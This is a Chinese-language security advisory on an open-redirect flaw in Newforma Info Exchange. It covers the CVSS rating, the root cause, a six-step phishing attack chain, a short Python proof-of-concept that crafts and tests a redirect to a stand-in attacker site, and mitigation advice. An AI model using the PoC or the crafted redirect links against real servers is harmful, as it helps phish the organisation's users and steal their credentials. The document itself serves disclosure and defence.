CVE-2025-35059 Newforma Info Exchange开放重定向漏洞

漏洞信息

漏洞编号

CVE-2025-35059

漏洞类型

开放重定向（Open Redirect）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Newforma Info Exchange (NIX)

漏洞概述

CVE-2025-35059是Newforma Info Exchange（NIX）产品中存在的一个开放重定向漏洞。该漏洞位于NIX的/DownloadWeb/hyperlinkredirect.aspx端点中，由于程序未对'nhl'参数传入的URL进行充分的验证和过滤，导致未经身份认证的远程攻击者可以通过构造恶意的URL链接，将用户重定向到任意外部网站。

根据CVSS 3.1评分体系，该漏洞评分为4.3分，属于中危级别。攻击者无需任何权限即可利用此漏洞，但需要用户进行交互（如点击恶意链接）。漏洞主要影响系统的完整性，对机密性和可用性没有直接影响。

开放重定向漏洞虽然本身不会直接导致系统被入侵或数据泄露，但常被攻击者用作钓鱼攻击的辅助手段。攻击者可以利用受信任域名的重定向功能，诱导用户访问恶意网站，从而窃取用户凭证、传播恶意软件或实施其他社会工程学攻击。对于企业级协作和信息交换平台（如Newforma NIX），此类漏洞可能严重影响用户对平台的信任度，并被用于针对特定组织的高级持续性威胁（APT）攻击中。

该漏洞由CISA（美国网络安全和基础设施安全局）收录，参考链接中包含了CSAF（通用安全咨询框架）格式的安全公告，表明该漏洞已被官方确认并纳入了漏洞管理流程。

技术细节

Newforma Info Exchange（NIX）的/DownloadWeb/hyperlinkredirect.aspx端点实现了一个URL重定向功能，该功能接受名为'nhl'的查询参数作为目标URL。在正常使用时，该功能用于将用户从NIX平台重定向到外部链接（例如项目文档、项目网站等）。

漏洞的根本原因在于服务端未对'nhl'参数的值进行严格的URL验证和过滤。具体而言：

1. **输入验证缺失**：程序未检查'nhl'参数的值是否为合法URL，也未限制重定向目标必须属于白名单域名列表（如仅允许重定向到NIX平台自身的资源链接）。

2. **未认证访问**：该重定向功能无需任何身份认证即可访问（PR:N），这意味着攻击者无需拥有NIX平台的账户即可构造恶意链接。

3. **用户交互需求**：由于需要用户点击恶意链接（UI:R），攻击者需要通过钓鱼邮件、即时消息或其他社会工程学手段诱导受害者访问精心构造的URL。

利用方式如下：攻击者构造一个指向`https://victim-nix-server/DownloadWeb/hyperlinkredirect.aspx?nhl=https://malicious-site.com`的URL，由于该URL托管在受信任的NIX服务器域名下，受害者更容易相信链接的合法性。当用户点击该链接时，服务器将返回302重定向响应，将用户浏览器重定向到攻击者控制的恶意网站。

此漏洞的危害在于：攻击者可以利用受信域名绕过电子邮件安全网关和用户的安全意识检查，实施钓鱼攻击；可结合其他漏洞或攻击手段进行水坑攻击；在多阶段攻击中作为初始访问向量的一部分使用。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过公开渠道或Shodan等搜索引擎发现目标组织使用的Newforma Info Exchange（NIX）服务器，确认目标服务器的域名和URL结构。

STEP 2

步骤2：构造恶意链接

攻击者构造包含开放重定向漏洞的恶意URL：https://victim-nix-server/DownloadWeb/hyperlinkredirect.aspx?nhl=https://attacker-malicious-site.com。由于URL托管在受信域名下，具有较高的欺骗性。

STEP 3

步骤3：投递钓鱼链接

攻击者通过钓鱼邮件、企业即时通讯工具（如Slack、Teams）或其他社会工程学手段，将恶意链接发送给目标组织的NIX用户。邮件安全网关通常不会拦截来自受信域名的链接。

STEP 4

步骤4：受害者点击链接

受害者看到链接来自可信的NIX服务器域名，点击链接后被重定向到攻击者控制的恶意网站。

STEP 5

步骤5：实施进一步攻击

在恶意网站上，攻击者可以实施钓鱼登录页面以窃取用户凭证、分发恶意软件、利用浏览器漏洞进行客户端攻击，或窃取NIX会话令牌等敏感信息。

STEP 6

步骤6：利用窃取的凭证

攻击者使用窃取到的NIX用户凭证登录系统，访问项目文档、敏感信息或进一步在企业内网中横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-35059 - Newforma Info Exchange (NIX) Open Redirect PoC
# The vulnerability exists in /DownloadWeb/hyperlinkredirect.aspx via the 'nhl' parameter
# This endpoint performs an unauthenticated URL redirect without proper validation

import requests

# Target NIX server (replace with actual victim server)
target_url = "https://victim-nix-server.example.com"

# Malicious destination URL controlled by attacker
malicious_redirect = "https://attacker-controlled-malicious-site.com/phishing"

# Construct the exploit URL - the 'nhl' parameter accepts arbitrary URLs without validation
exploit_url = f"{target_url}/DownloadWeb/hyperlinkredirect.aspx?nhl={malicious_redirect}"

print(f"[*] Crafted Open Redirect URL:")
print(f"    {exploit_url}")
print()

# Send the request (allow_redirects=False to observe the 302 redirect response)
response = requests.get(exploit_url, allow_redirects=False, verify=False)

print(f"[*] Response Status Code: {response.status_code}")
print(f"[*] Location Header (Redirect Target): {response.headers.get('Location', 'N/A')}")
print()

if response.status_code in (301, 302, 303, 307, 308):
    location = response.headers.get('Location', '')
    if malicious_redirect in location:
        print("[+] Vulnerability confirmed! The server redirects to an arbitrary external URL.")
        print(f"[+] User would be redirected to: {location}")
    else:
        print("[-] Redirect target does not match the injected URL.")
else:
    print("[-] No redirect response received.")

# Example crafted phishing URL that can be sent to victims:
# https://victim-nix-server.example.com/DownloadWeb/hyperlinkredirect.aspx?nhl=https://attacker.com/fake-login
# Since the domain appears to be the trusted NIX server, victims are more likely to click it.

影响范围

Newforma Info Exchange (NIX) - 所有未修复的版本

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面（如IIS、nginx）配置URL重写规则，对/DownloadWeb/hyperlinkredirect.aspx的响应进行过滤，仅允许重定向到预先批准的内部域名列表，拒绝所有外部域名的重定向请求；2）部署WAF规则，匹配包含外部URL的'nhl'参数值并予以拦截；3）加强用户安全意识培训，提醒员工不要轻易点击来自NIX服务器的链接，特别是包含可疑重定向参数的链接；4）监控NIX服务器的访问日志，关注异常的/DownloadWeb/hyperlinkredirect.aspx请求模式；5）如非必要，可考虑在防火墙层面限制/DownloadWeb/hyperlinkredirect.aspx端点的外部访问。